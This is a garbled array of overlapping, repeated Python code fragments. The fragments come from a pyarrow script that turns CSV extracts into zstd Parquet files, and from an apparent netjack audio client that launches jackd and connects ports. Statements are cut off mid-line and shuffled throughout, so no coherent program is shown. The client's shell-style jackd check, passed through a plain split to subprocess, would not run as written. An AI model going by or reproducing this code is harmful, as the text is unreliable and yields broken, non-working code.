pyarrow import csv as pcsv from", "block_size=1000000000) parse_options = pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\", \"T\"], false_values=[\"0\", \"F\"],", "pa from pyarrow import csv as pcsv from pyarrow import parquet as pq", "is not True] return [(name, sql_type_lookup[type(dtype)]) for name, dtype in cols] def write_files(metadata:", "1000000000 sql_type_lookup: Dict[Type[TypeEngine], str] = { Integer: 'int32', SmallInteger: 'int16', Float: 'float64', String:", "true_values=[\"1\", \"T\"], false_values=[\"0\", \"F\"], strings_can_be_null=True) parquet_writer = pq.ParquetWriter(parquet_file, schema=arrow_schema, compression='zstd', version=\"2.0\", use_dictionary=True) stream_reader", "Dict, Type, Iterator, List, Tuple import pyarrow as pa from pyarrow import csv", "# Larger sizes result in better compression and slightly faster time, # but", "None: \"\"\" Creates a Parquet file for each table in the schema. \"\"\"", "import TypeEngine from src.schemas import all_metadata from src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX =", "faster time, # but don't want to risk OOM issues on small build", "table.columns.values() if c.autoincrement is not True] return [(name, sql_type_lookup[type(dtype)]) for name, dtype in", "PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\") # How many bytes in each CSV", "schema=arrow_schema, compression='zstd', version=\"2.0\", use_dictionary=True) stream_reader = pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options) for batch in", "want to risk OOM issues on small build boxes. BUFFER_SIZE_BYTES = 1000000000 sql_type_lookup:", "false_values=[\"0\", \"F\"], strings_can_be_null=True) parquet_writer = pq.ParquetWriter(parquet_file, schema=arrow_schema, compression='zstd', version=\"2.0\", use_dictionary=True) stream_reader = pcsv.open_csv(extract_file,", "AlchemyMetadata, Table as AlchemyTable from sqlalchemy import Integer, SmallInteger, Float, String, CHAR, Text,", "CSV chunk to bring into memory. # Larger sizes result in better compression", "= get_path(EXTRACT_PATH_PREFIX, \".csv.zst\") parquet_file = get_path(PARQUET_PREFIX, \".parquet\") arrow_schema = pa.schema(get_fields(table)) column_names = [name", "= TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\") # How many bytes in each CSV chunk", "column_names = [name for name, dtype in get_fields(table)] read_options = pcsv.ReadOptions(column_names=column_names, block_size=1000000000) parse_options", "Table as AlchemyTable from sqlalchemy import Integer, SmallInteger, Float, String, CHAR, Text, Boolean,", "def get_fields(table: AlchemyTable) -> List[Tuple[str, str]]: cols = [(c.name, c.type) for c in", "= [(c.name, c.type) for c in table.columns.values() if c.autoincrement is not True] return", "write_files(metadata: AlchemyMetadata) -> None: \"\"\" Creates a Parquet file for each table in", "= pq.ParquetWriter(parquet_file, schema=arrow_schema, compression='zstd', version=\"2.0\", use_dictionary=True) stream_reader = pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options) for", "read_options=read_options, parse_options=parse_options, convert_options=convert_options) for batch in stream_reader: table = pa.Table.from_batches([batch]) parquet_writer.write_table(table) parquet_writer.close() if", "\".parquet\") arrow_schema = pa.schema(get_fields(table)) column_names = [name for name, dtype in get_fields(table)] read_options", "pathlib import Path from typing import Dict, Type, Iterator, List, Tuple import pyarrow", "import Integer, SmallInteger, Float, String, CHAR, Text, Boolean, Date, DateTime from sqlalchemy.sql.type_api import", "TRANSFORM_PATH_PREFIX PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\") # How many bytes in each", "suffix: str): parent_dir = prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True, parents=True) return parent_dir.joinpath(name).with_suffix(suffix) extract_file = get_path(EXTRACT_PATH_PREFIX, \".csv.zst\")", "'timestamp[ms]', DateTime: 'timestamp[ms]' } def get_fields(table: AlchemyTable) -> List[Tuple[str, str]]: cols = [(c.name,", "timestamps Date: 'timestamp[ms]', DateTime: 'timestamp[ms]' } def get_fields(table: AlchemyTable) -> List[Tuple[str, str]]: cols", "file for each table in the schema. \"\"\" tables: Iterator[AlchemyTable] = metadata.tables.values() for", "str]]: cols = [(c.name, c.type) for c in table.columns.values() if c.autoincrement is not", "import csv as pcsv from pyarrow import parquet as pq from sqlalchemy import", "SmallInteger: 'int16', Float: 'float64', String: 'str', CHAR: 'str', Text: 'str', Boolean: 'bool', #", "\"T\"], false_values=[\"0\", \"F\"], strings_can_be_null=True) parquet_writer = pq.ParquetWriter(parquet_file, schema=arrow_schema, compression='zstd', version=\"2.0\", use_dictionary=True) stream_reader =", "compression='zstd', version=\"2.0\", use_dictionary=True) stream_reader = pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options) for batch in stream_reader:", "build boxes. BUFFER_SIZE_BYTES = 1000000000 sql_type_lookup: Dict[Type[TypeEngine], str] = { Integer: 'int32', SmallInteger:", "= TRANSFORM_PATH_PREFIX.joinpath(\"csv\") # How many bytes in each CSV chunk to bring into", "True] return [(name, sql_type_lookup[type(dtype)]) for name, dtype in cols] def write_files(metadata: AlchemyMetadata) ->", "CHAR: 'str', Text: 'str', Boolean: 'bool', # Some Parquet targets can't handle Parquet", "get_fields(table)] read_options = pcsv.ReadOptions(column_names=column_names, block_size=1000000000) parse_options = pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"],", "batch in stream_reader: table = pa.Table.from_batches([batch]) parquet_writer.write_table(table) parquet_writer.close() if __name__ == \"__main__\": for", "don't want to risk OOM issues on small build boxes. BUFFER_SIZE_BYTES = 1000000000", "sql_type_lookup[type(dtype)]) for name, dtype in cols] def write_files(metadata: AlchemyMetadata) -> None: \"\"\" Creates", "as pq from sqlalchemy import MetaData as AlchemyMetadata, Table as AlchemyTable from sqlalchemy", "parse_options=parse_options, convert_options=convert_options) for batch in stream_reader: table = pa.Table.from_batches([batch]) parquet_writer.write_table(table) parquet_writer.close() if __name__", "for each table in the schema. \"\"\" tables: Iterator[AlchemyTable] = metadata.tables.values() for table", "in cols] def write_files(metadata: AlchemyMetadata) -> None: \"\"\" Creates a Parquet file for", "Type, Iterator, List, Tuple import pyarrow as pa from pyarrow import csv as", "= [name for name, dtype in get_fields(table)] read_options = pcsv.ReadOptions(column_names=column_names, block_size=1000000000) parse_options =", "timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\", \"T\"], false_values=[\"0\", \"F\"], strings_can_be_null=True) parquet_writer = pq.ParquetWriter(parquet_file, schema=arrow_schema, compression='zstd', version=\"2.0\",", "parent_dir.mkdir(exist_ok=True, parents=True) return parent_dir.joinpath(name).with_suffix(suffix) extract_file = get_path(EXTRACT_PATH_PREFIX, \".csv.zst\") parquet_file = get_path(PARQUET_PREFIX, \".parquet\") arrow_schema", "each CSV chunk to bring into memory. # Larger sizes result in better", "return [(name, sql_type_lookup[type(dtype)]) for name, dtype in cols] def write_files(metadata: AlchemyMetadata) -> None:", "-> List[Tuple[str, str]]: cols = [(c.name, c.type) for c in table.columns.values() if c.autoincrement", "from sqlalchemy import MetaData as AlchemyMetadata, Table as AlchemyTable from sqlalchemy import Integer,", "on small build boxes. BUFFER_SIZE_BYTES = 1000000000 sql_type_lookup: Dict[Type[TypeEngine], str] = { Integer:", "pyarrow import parquet as pq from sqlalchemy import MetaData as AlchemyMetadata, Table as", "in tables: name = table.name print(name) def get_path(prefix: Path, suffix: str): parent_dir =", "\"%Y-%m-%d\"], true_values=[\"1\", \"T\"], false_values=[\"0\", \"F\"], strings_can_be_null=True) parquet_writer = pq.ParquetWriter(parquet_file, schema=arrow_schema, compression='zstd', version=\"2.0\", use_dictionary=True)", "convert_options=convert_options) for batch in stream_reader: table = pa.Table.from_batches([batch]) parquet_writer.write_table(table) parquet_writer.close() if __name__ ==", "# How many bytes in each CSV chunk to bring into memory. #", "Path, suffix: str): parent_dir = prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True, parents=True) return parent_dir.joinpath(name).with_suffix(suffix) extract_file = get_path(EXTRACT_PATH_PREFIX,", "table.name print(name) def get_path(prefix: Path, suffix: str): parent_dir = prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True, parents=True) return", "'str', Boolean: 'bool', # Some Parquet targets can't handle Parquet dates, so we", "Date: 'timestamp[ms]', DateTime: 'timestamp[ms]' } def get_fields(table: AlchemyTable) -> List[Tuple[str, str]]: cols =", "Creates a Parquet file for each table in the schema. \"\"\" tables: Iterator[AlchemyTable]", "c in table.columns.values() if c.autoincrement is not True] return [(name, sql_type_lookup[type(dtype)]) for name,", "stream_reader: table = pa.Table.from_batches([batch]) parquet_writer.write_table(table) parquet_writer.close() if __name__ == \"__main__\": for m in", "bytes in each CSV chunk to bring into memory. # Larger sizes result", "TRANSFORM_PATH_PREFIX.joinpath(\"csv\") # How many bytes in each CSV chunk to bring into memory.", "BUFFER_SIZE_BYTES = 1000000000 sql_type_lookup: Dict[Type[TypeEngine], str] = { Integer: 'int32', SmallInteger: 'int16', Float:", "prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True, parents=True) return parent_dir.joinpath(name).with_suffix(suffix) extract_file = get_path(EXTRACT_PATH_PREFIX, \".csv.zst\") parquet_file = get_path(PARQUET_PREFIX, \".parquet\")", "extract_file = get_path(EXTRACT_PATH_PREFIX, \".csv.zst\") parquet_file = get_path(PARQUET_PREFIX, \".parquet\") arrow_schema = pa.schema(get_fields(table)) column_names =", "in each CSV chunk to bring into memory. # Larger sizes result in", "as AlchemyTable from sqlalchemy import Integer, SmallInteger, Float, String, CHAR, Text, Boolean, Date,", "List[Tuple[str, str]]: cols = [(c.name, c.type) for c in table.columns.values() if c.autoincrement is", "chunk to bring into memory. # Larger sizes result in better compression and", "c.autoincrement is not True] return [(name, sql_type_lookup[type(dtype)]) for name, dtype in cols] def", "-> None: \"\"\" Creates a Parquet file for each table in the schema.", "stream_reader = pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options) for batch in stream_reader: table = pa.Table.from_batches([batch])", "pa.schema(get_fields(table)) column_names = [name for name, dtype in get_fields(table)] read_options = pcsv.ReadOptions(column_names=column_names, block_size=1000000000)", "= prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True, parents=True) return parent_dir.joinpath(name).with_suffix(suffix) extract_file = get_path(EXTRACT_PATH_PREFIX, \".csv.zst\") parquet_file = get_path(PARQUET_PREFIX,", "issues on small build boxes. BUFFER_SIZE_BYTES = 1000000000 sql_type_lookup: Dict[Type[TypeEngine], str] = {", "a Parquet file for each table in the schema. \"\"\" tables: Iterator[AlchemyTable] =", "to bring into memory. # Larger sizes result in better compression and slightly", "sqlalchemy import Integer, SmallInteger, Float, String, CHAR, Text, Boolean, Date, DateTime from sqlalchemy.sql.type_api", "from pathlib import Path from typing import Dict, Type, Iterator, List, Tuple import", "sqlalchemy import MetaData as AlchemyMetadata, Table as AlchemyTable from sqlalchemy import Integer, SmallInteger,", "if c.autoincrement is not True] return [(name, sql_type_lookup[type(dtype)]) for name, dtype in cols]", "import parquet as pq from sqlalchemy import MetaData as AlchemyMetadata, Table as AlchemyTable", "str): parent_dir = prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True, parents=True) return parent_dir.joinpath(name).with_suffix(suffix) extract_file = get_path(EXTRACT_PATH_PREFIX, \".csv.zst\") parquet_file", "# but don't want to risk OOM issues on small build boxes. BUFFER_SIZE_BYTES", "memory. # Larger sizes result in better compression and slightly faster time, #", "into memory. # Larger sizes result in better compression and slightly faster time,", "Iterator, List, Tuple import pyarrow as pa from pyarrow import csv as pcsv", "\"\"\" tables: Iterator[AlchemyTable] = metadata.tables.values() for table in tables: name = table.name print(name)", "so we need to parse and pass timestamps Date: 'timestamp[ms]', DateTime: 'timestamp[ms]' }", "parquet as pq from sqlalchemy import MetaData as AlchemyMetadata, Table as AlchemyTable from", "arrow_schema = pa.schema(get_fields(table)) column_names = [name for name, dtype in get_fields(table)] read_options =", "Larger sizes result in better compression and slightly faster time, # but don't", "String: 'str', CHAR: 'str', Text: 'str', Boolean: 'bool', # Some Parquet targets can't", "metadata.tables.values() for table in tables: name = table.name print(name) def get_path(prefix: Path, suffix:", "= pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\", \"T\"], false_values=[\"0\", \"F\"], strings_can_be_null=True) parquet_writer", "pyarrow as pa from pyarrow import csv as pcsv from pyarrow import parquet", "schema. \"\"\" tables: Iterator[AlchemyTable] = metadata.tables.values() for table in tables: name = table.name", "TypeEngine from src.schemas import all_metadata from src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\")", "get_path(PARQUET_PREFIX, \".parquet\") arrow_schema = pa.schema(get_fields(table)) column_names = [name for name, dtype in get_fields(table)]", "Tuple import pyarrow as pa from pyarrow import csv as pcsv from pyarrow", "pq.ParquetWriter(parquet_file, schema=arrow_schema, compression='zstd', version=\"2.0\", use_dictionary=True) stream_reader = pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options) for batch", "name = table.name print(name) def get_path(prefix: Path, suffix: str): parent_dir = prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True,", "and pass timestamps Date: 'timestamp[ms]', DateTime: 'timestamp[ms]' } def get_fields(table: AlchemyTable) -> List[Tuple[str,", "in table.columns.values() if c.autoincrement is not True] return [(name, sql_type_lookup[type(dtype)]) for name, dtype", "Text, Boolean, Date, DateTime from sqlalchemy.sql.type_api import TypeEngine from src.schemas import all_metadata from", "c.type) for c in table.columns.values() if c.autoincrement is not True] return [(name, sql_type_lookup[type(dtype)])", "pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\", \"T\"], false_values=[\"0\", \"F\"], strings_can_be_null=True) parquet_writer =", "in get_fields(table)] read_options = pcsv.ReadOptions(column_names=column_names, block_size=1000000000) parse_options = pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\",", "AlchemyTable from sqlalchemy import Integer, SmallInteger, Float, String, CHAR, Text, Boolean, Date, DateTime", "in the schema. \"\"\" tables: Iterator[AlchemyTable] = metadata.tables.values() for table in tables: name", "\".csv.zst\") parquet_file = get_path(PARQUET_PREFIX, \".parquet\") arrow_schema = pa.schema(get_fields(table)) column_names = [name for name,", "all_metadata from src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\") #", "table in tables: name = table.name print(name) def get_path(prefix: Path, suffix: str): parent_dir", "'float64', String: 'str', CHAR: 'str', Text: 'str', Boolean: 'bool', # Some Parquet targets", "'str', Text: 'str', Boolean: 'bool', # Some Parquet targets can't handle Parquet dates,", "pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options) for batch in stream_reader: table = pa.Table.from_batches([batch]) parquet_writer.write_table(table) parquet_writer.close()", "sql_type_lookup: Dict[Type[TypeEngine], str] = { Integer: 'int32', SmallInteger: 'int16', Float: 'float64', String: 'str',", "from pyarrow import parquet as pq from sqlalchemy import MetaData as AlchemyMetadata, Table", "'int32', SmallInteger: 'int16', Float: 'float64', String: 'str', CHAR: 'str', Text: 'str', Boolean: 'bool',", "use_dictionary=True) stream_reader = pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options) for batch in stream_reader: table =", "CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\") # How many bytes in each CSV chunk to bring" ]
[ "#look at ports, find incoming netjack channel, #name of net port will have", "at ports, find incoming netjack channel, #name of net port will have some", "- hostname, time up, messages #passed through socket, etc. def runbash(self, cmd): process", "to system out #print something to cmd line - hostname, time up, messages", "-ef | grep jackd); if [[ $ijo == *\"/jackd\"* ]]; then echo \"RUNNING\";", "'jackd -R -d net' output, error = self.runbash(cmd) else: cmd = 'jackd -d", "# ---ESTABLISH SOCKET CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- # #slave", "---ESTABLISH SOCKET CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- # #slave -", "jclient = jack.Client('JackClient') #wait for server to verify netjack RUNNING #look at ports,", "output[0] == 'RUNNING': cmd = 'jackd -R -d net' output, error = self.runbash(cmd)", "net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to system out #print", "some identifying label - #figure it out ... here pretend it's TOKEN net_in_p", "CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- # #slave - open jackd", "echo \"RUNNING\"; fi' output, error = self.runbash(cmd0) if not output[0] == 'RUNNING': cmd", "if [[ $ijo == *\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output, error =", "output, error if __name__ == \"__main__\": # nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------')", "RUNNING #look at ports, find incoming netjack channel, #name of net port will", "for server to verify netjack RUNNING #look at ports, find incoming netjack channel,", "PROCEED--- # #slave - open jackd with net backend cmd0 = 'ijo=$(ps -ef", "output, error = self.runbash(cmd0) if not output[0] == 'RUNNING': cmd = 'jackd -R", "to cmd line - hostname, time up, messages #passed through socket, etc. def", "through socket, etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error =", "#passed through socket, etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error", "# #slave - open jackd with net backend cmd0 = 'ijo=$(ps -ef |", "grep jackd); if [[ $ijo == *\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output,", "= 'jackd -d net' output, error = self.runbash(cmd) #ISSUE: maybe doesn't work without", "error = self.runbash(cmd0) if not output[0] == 'RUNNING': cmd = 'jackd -R -d", "- #figure it out ... here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p", "$ijo == *\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output, error = self.runbash(cmd0) if", "it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to system", "cmd line - hostname, time up, messages #passed through socket, etc. def runbash(self,", "stdout=subprocess.PIPE) output, error = process.communicate() return output, error if __name__ == \"__main__\": #", "channel, #name of net port will have some identifying label - #figure it", "# ---ONCE ESTABLISHED, PROCEED--- # #slave - open jackd with net backend cmd0", "port will have some identifying label - #figure it out ... here pretend", "= self.runbash(cmd) #ISSUE: maybe doesn't work without -R realtime flag? #start jack client", "# nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c) <NAME> 2018----------') print('---------------------------------------')", "verify netjack RUNNING #look at ports, find incoming netjack channel, #name of net", "Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER--- # # ---ONCE", "cmd = 'jackd -R -d net' output, error = self.runbash(cmd) else: cmd =", "#start jack client to manage connections jclient = jack.Client('JackClient') #wait for server to", "ports, find incoming netjack channel, #name of net port will have some identifying", "jack.Client('JackClient') #wait for server to verify netjack RUNNING #look at ports, find incoming", "ESTABLISHED, PROCEED--- # #slave - open jackd with net backend cmd0 = 'ijo=$(ps", "from socket import * from threading import Thread import jack class Client(): def", "= jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to system out #print something", "-d net' output, error = self.runbash(cmd) #ISSUE: maybe doesn't work without -R realtime", "error if __name__ == \"__main__\": # nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------')", "* from threading import Thread import jack class Client(): def __init__(self): #@todo: #", "incoming netjack channel, #name of net port will have some identifying label -", "pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to", "#print something to cmd line - hostname, time up, messages #passed through socket,", "os, subprocess from socket import * from threading import Thread import jack class", "socket import * from threading import Thread import jack class Client(): def __init__(self):", "'ijo=$(ps -ef | grep jackd); if [[ $ijo == *\"/jackd\"* ]]; then echo", "\"__main__\": # nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c) <NAME> 2018----------')", "of net port will have some identifying label - #figure it out ...", "socket, etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate()", "-R -d net' output, error = self.runbash(cmd) else: cmd = 'jackd -d net'", "= jclient.get_ports('system:playback_*') # connect net_in_p to system out #print something to cmd line", "-R realtime flag? #start jack client to manage connections jclient = jack.Client('JackClient') #wait", "from threading import Thread import jack class Client(): def __init__(self): #@todo: # ---ESTABLISH", "process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return output, error if __name__", "cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return output, error if", "without -R realtime flag? #start jack client to manage connections jclient = jack.Client('JackClient')", "to manage connections jclient = jack.Client('JackClient') #wait for server to verify netjack RUNNING", "subprocess from socket import * from threading import Thread import jack class Client():", "if __name__ == \"__main__\": # nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------')", "netjack RUNNING #look at ports, find incoming netjack channel, #name of net port", "will have some identifying label - #figure it out ... here pretend it's", "\"RUNNING\"; fi' output, error = self.runbash(cmd0) if not output[0] == 'RUNNING': cmd =", "work without -R realtime flag? #start jack client to manage connections jclient =", "jack class Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER--- #", "# connect net_in_p to system out #print something to cmd line - hostname,", "#wait for server to verify netjack RUNNING #look at ports, find incoming netjack", "connections jclient = jack.Client('JackClient') #wait for server to verify netjack RUNNING #look at", "flag? #start jack client to manage connections jclient = jack.Client('JackClient') #wait for server", "here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p", "SOCKET CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- # #slave - open", "#name of net port will have some identifying label - #figure it out", "import Thread import jack class Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION", "process.communicate() return output, error if __name__ == \"__main__\": # nice opening message print('\\n')", "subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return output, error if __name__ == \"__main__\":", "nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c) <NAME> 2018----------') print('---------------------------------------') print('------------~client", "'RUNNING': cmd = 'jackd -R -d net' output, error = self.runbash(cmd) else: cmd", "- open jackd with net backend cmd0 = 'ijo=$(ps -ef | grep jackd);", "self.runbash(cmd0) if not output[0] == 'RUNNING': cmd = 'jackd -R -d net' output,", "hostname, time up, messages #passed through socket, etc. def runbash(self, cmd): process =", "#slave - open jackd with net backend cmd0 = 'ijo=$(ps -ef | grep", "= 'jackd -R -d net' output, error = self.runbash(cmd) else: cmd = 'jackd", "open jackd with net backend cmd0 = 'ijo=$(ps -ef | grep jackd); if", "import jack class Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER---", "-d net' output, error = self.runbash(cmd) else: cmd = 'jackd -d net' output,", "cmd0 = 'ijo=$(ps -ef | grep jackd); if [[ $ijo == *\"/jackd\"* ]];", "[[ $ijo == *\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output, error = self.runbash(cmd0)", "time up, messages #passed through socket, etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(),", "]]; then echo \"RUNNING\"; fi' output, error = self.runbash(cmd0) if not output[0] ==", "client to manage connections jclient = jack.Client('JackClient') #wait for server to verify netjack", "error = process.communicate() return output, error if __name__ == \"__main__\": # nice opening", "== 'RUNNING': cmd = 'jackd -R -d net' output, error = self.runbash(cmd) else:", "= self.runbash(cmd) else: cmd = 'jackd -d net' output, error = self.runbash(cmd) #ISSUE:", "__name__ == \"__main__\": # nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c)", "out ... here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') #", "runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return output, error", "not output[0] == 'RUNNING': cmd = 'jackd -R -d net' output, error =", "self.runbash(cmd) #ISSUE: maybe doesn't work without -R realtime flag? #start jack client to", "= subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return output, error if __name__ ==", "= jack.Client('JackClient') #wait for server to verify netjack RUNNING #look at ports, find", "error = self.runbash(cmd) else: cmd = 'jackd -d net' output, error = self.runbash(cmd)", "#ISSUE: maybe doesn't work without -R realtime flag? #start jack client to manage", "something to cmd line - hostname, time up, messages #passed through socket, etc.", "messages #passed through socket, etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output,", "net' output, error = self.runbash(cmd) #ISSUE: maybe doesn't work without -R realtime flag?", "TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to system out", "jclient.get_ports('system:playback_*') # connect net_in_p to system out #print something to cmd line -", "SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- # #slave - open jackd with net", "= self.runbash(cmd0) if not output[0] == 'RUNNING': cmd = 'jackd -R -d net'", "manage connections jclient = jack.Client('JackClient') #wait for server to verify netjack RUNNING #look", "| grep jackd); if [[ $ijo == *\"/jackd\"* ]]; then echo \"RUNNING\"; fi'", "line - hostname, time up, messages #passed through socket, etc. def runbash(self, cmd):", "jackd); if [[ $ijo == *\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output, error", "label - #figure it out ... here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*')", "out #print something to cmd line - hostname, time up, messages #passed through", "__init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED---", "message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c) <NAME> 2018----------') print('---------------------------------------') print('------------~client edition~-----------') print('\\n')", "connect net_in_p to system out #print something to cmd line - hostname, time", "= 'ijo=$(ps -ef | grep jackd); if [[ $ijo == *\"/jackd\"* ]]; then", "backend cmd0 = 'ijo=$(ps -ef | grep jackd); if [[ $ijo == *\"/jackd\"*", "<reponame>pitchaim/codecast<gh_stars>0 import os, subprocess from socket import * from threading import Thread import", "system out #print something to cmd line - hostname, time up, messages #passed", "== *\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output, error = self.runbash(cmd0) if not", "WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- # #slave - open jackd with", "then echo \"RUNNING\"; fi' output, error = self.runbash(cmd0) if not output[0] == 'RUNNING':", "net' output, error = self.runbash(cmd) else: cmd = 'jackd -d net' output, error", "with net backend cmd0 = 'ijo=$(ps -ef | grep jackd); if [[ $ijo", "if not output[0] == 'RUNNING': cmd = 'jackd -R -d net' output, error", "class Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER--- # #", "jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to system out #print something to", "output, error = process.communicate() return output, error if __name__ == \"__main__\": # nice", "jackd with net backend cmd0 = 'ijo=$(ps -ef | grep jackd); if [[", "*\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output, error = self.runbash(cmd0) if not output[0]", "fi' output, error = self.runbash(cmd0) if not output[0] == 'RUNNING': cmd = 'jackd", "up, messages #passed through socket, etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)", "== \"__main__\": # nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c) <NAME>", "jack client to manage connections jclient = jack.Client('JackClient') #wait for server to verify", "find incoming netjack channel, #name of net port will have some identifying label", "identifying label - #figure it out ... here pretend it's TOKEN net_in_p =", "error = self.runbash(cmd) #ISSUE: maybe doesn't work without -R realtime flag? #start jack", "... here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect", "doesn't work without -R realtime flag? #start jack client to manage connections jclient", "to verify netjack RUNNING #look at ports, find incoming netjack channel, #name of", "maybe doesn't work without -R realtime flag? #start jack client to manage connections", "import * from threading import Thread import jack class Client(): def __init__(self): #@todo:", "Thread import jack class Client(): def __init__(self): #@todo: 